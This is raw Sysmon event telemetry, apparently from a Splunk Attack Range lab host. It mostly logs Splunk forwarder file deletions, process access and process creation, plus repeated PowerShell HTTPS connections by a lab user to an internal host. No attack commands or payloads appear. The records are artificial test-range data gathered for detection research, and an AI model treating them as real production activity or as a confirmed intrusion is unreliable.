Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1569EC527D68A7A190200450201F8BBC,SHA256=1C09E530AF28251032AA2D59F113B6EA679E580F1B9678C824CA9D4872B33F96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:23.193{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8197EC6C5CFCFCAF0E57F182B1FC2705,SHA256=9D0B9DD68769F5257C3B385608D9C23642B213CC4151EF97A7BE911720C57F38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.992{B81B27B7-9F40-6140-4E56-04000000C801}49843380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:24.829{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.829{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.825{B81B27B7-9F40-6140-4E56-04000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=846FD6B9F93A34FDD872CAE1BA552F2F,SHA256=39B7E341ABCD439387CF0DD7067D5338E0D854D641329F5E7501E5302E003A8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:24.327{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:24.324{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.323{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.323{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.293{B81B27B7-9F40-6140-4D56-04000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.959{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=272E6A6F5A50BB05AF074334FEA79117,SHA256=260BA69647A066EC8EEAA9FC0A5C35951DAFCB59111D1786066BFC36F31E41A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.628{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566C3C5582B6DB0F07FB58DA1E2F6A4E,SHA256=5786F6A9CDC7F48D6A9CF4E56AB4BC4A7484389B71837A43A94FBD3F7C550155,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=545ABA38114B2CFC5B5F4D126A04B556,SHA256=F18625850F481B434E69001BD1DE9FE7E7438D28BAFEC261383FD783120F2368,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:25.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E48885003619F6D03B453579832167BE,SHA256=99A43D9A184034EFE7A059FA5DC69BCCD638ABC8AF08B6998C5991E486F53AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:26.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
insufficient disk space 354300x800000000000000036496212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:16.637{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50379-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:15.921{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50378-false10.0.1.12-8000- 23542300x800000000000000036496210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:47.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=098F742621121B96E0AB6D652D672B60,SHA256=C419C3CE89A88DD2EFD26AD6889EBE8E4F0C24638FA8236ED96BD11CAE10A48F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:48.124{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0201D853EC07BA4D114EBB194EAB95A3,SHA256=11F2D03328A615040FDBF65408DCB9DC3FDB7E31593A2BF7665FB63021294F09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:49.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F237B22C2960435DE7F12E4E29BD9BAE,SHA256=ECD4769DE920E5C0F50462265613AF41609BF327B79EE83F97591DAA3FC15CD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:50.222{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C93BF097D1A7F38603CC2DD1D7CCBD5,SHA256=B049A3CBBA5767B58E102A188765D9226154CDCDF67090B6321532EEAD00D7B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:51.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3964133244328569F6F6D4D3B9B7C0DC,SHA256=B49805850559EED3B3C96964B2D68A0FD03E94B0569A746F2B7AF9874D93B6C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:21.679{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50380-false10.0.1.12-8000- 
23542300x800000000000000036496216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:51.253{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70D7207A2C103B59B5D0AA195F4659C9,SHA256=C49C908BD9F82FD0AB9449F9B31EFA2CE76FBEB3957114124F75A356BBB7FC4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:22.647{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50381-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:52.283{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0898571E6D7AF009CF6808EC681081D8,SHA256=E8B3D2626471BFAC00D05EA506D32CC815C1E408FB831A3B1AA12E4CBEAF0022,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:53.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31496B8597DA33E2E2250F88252921F2,SHA256=2E52DFC019E12DD4C606B37D3AEDDA3ADB7CFD9A0E1427ABD7115832C0BB78C4,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036496222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:54.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47EB5B69E64250CB40BE1F07D553D39,SHA256=0677C1F2692BF626E1E8B2FECB084E1B50256DC4FD996B5E5AEC681B36E2FA9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:55.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A5361ED669CC7DB511F8C1B657F6419,SHA256=47BEA73D738E90331AA9533CFF15D0CC31E5AEBBF0194885164A74134EBAF151,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:56.389{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 